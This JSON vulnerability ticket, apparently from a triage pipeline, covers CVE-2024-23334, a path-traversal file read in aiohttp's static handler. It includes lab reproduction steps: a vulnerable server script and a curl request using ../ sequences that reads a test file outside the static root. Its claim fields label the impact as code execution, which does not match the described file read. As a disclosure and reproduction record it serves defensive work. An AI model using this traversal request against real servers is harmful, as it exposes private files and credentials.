{
  "claim": {
    "argus_claim_ref": null,
    "attacker_control": null,
    "claimed_surface": "converter_document",
    "expected_impact": "code_execution",
    "finding_id": null,
    "id": null,
    "required_entrypoint_detail": null,
    "required_entrypoint_kind": "convert_document",
    "submission_reason": "ticket_derived",
    "trigger_class": "document_input",
    "upstream_verdicts": null
  },
  "latest_description": "## Summary\nImproper validation of static file paths in aiohttp’s `web.static()` handler allows directory traversal when `follow_symlinks=True`, enabling attackers to read arbitrary files outside the static root. The issue is fixed in aiohttp 3.9.2.\n\n## Affected Package\n- **Name:** aiohttp\n- **Ecosystem:** pip (Python)\n- **Vulnerable versions:** >= 1.0.5, < 3.9.2\n- **Patched version:** 3.9.2\n\n## Details\nWhen aiohttp is used as a web server and a static route is configured with `follow_symlinks=True`, the implementation does not validate that the resolved path stays within the static root directory. As a result, path traversal sequences (e.g., `../`) can escape the static root and read arbitrary files on the server filesystem. The issue occurs even when no symlinks are present. This is a CWE-22 (path traversal) vulnerability.\n\nMitigations recommended by maintainers include disabling `follow_symlinks` and using a reverse proxy (e.g., nginx) to serve static assets instead of aiohttp in production.\n\n## Reproduction Steps\n> **Note:** Use only in a lab environment. The steps below read a non-sensitive test file.\n\n### Environment setup\n1. Install a vulnerable version:\n   ```bash\n   python3 -m venv venv\n   source venv/bin/activate\n   pip install aiohttp==3.9.1\n   ```\n2. Create a minimal aiohttp server with a static route:\n   ```python\n   # save as server.py\n   from aiohttp import web\n   import os\n\n   app = web.Application()\n   os.makedirs(\"static\", exist_ok=True)\n   with open(\"static/index.html\", \"w\") as f:\n       f.write(\"ok\")\n\n   # Vulnerable configuration: follow_symlinks=True\n   app.router.add_routes([\n       web.static(\"/static\", \"static/\", follow_symlinks=True),\n   ])\n\n   web.run_app(app, host=\"127.0.0.1\", port=8080)\n   ```\n3. Create a probe file **outside** the static root:\n   ```bash\n   echo 'POC-AIOHTTP-VULN-TEST' > /tmp/poc-aiohttp-test.txt\n   ```\n4. Start the server:\n   ```bash\n   python3 server.py\n   ```\n\n### Trigger\n5. Request the probe file using path traversal (`--path-as-is` stops curl from normalizing the `../` segments away before the request is sent):\n   ```bash\n   curl -v --path-as-is \"http://127.0.0.1:8080/static/../../../../tmp/poc-aiohttp-test.txt\"\n   ```\n\n### Expected vs vulnerable behavior\n- **Expected (secure):** Server should reject traversal and return 404/403.\n- **Vulnerable:** Server responds with the contents of `/tmp/poc-aiohttp-test.txt`.\n\n## Indicators of Success\n- The HTTP response body contains `POC-AIOHTTP-VULN-TEST`, proving a file outside the static root was read.\n\n## References\n- https://nvd.nist.gov/vuln/detail/CVE-2024-23334\n- https://github.com/advisories/GHSA-5h86-8mv2-jq9f\n- https://github.com/aio-libs/aiohttp/commit/1c335944d6a8b1298baf179b7c0b3069f10c514b\n- https://github.com/aio-libs/aiohttp/pull/8079\n- https://www.exploit-db.com/exploits/52474\n- https://github.com/TheRedP4nther/LFI-aiohttp-CVE-2024-23334-PoC\n- https://github.com/brian-edgar-re/poc-cve-2024-23334",
  "product": "pip:aiohttp",
  "severity": "high",
  "status": "open",
  "summary": "aiohttp static file serving with follow_symlinks=True allows directory traversal and arbitrary file read outside the configured static root.",
  "ticket_id": "CVE-2024-23334"
}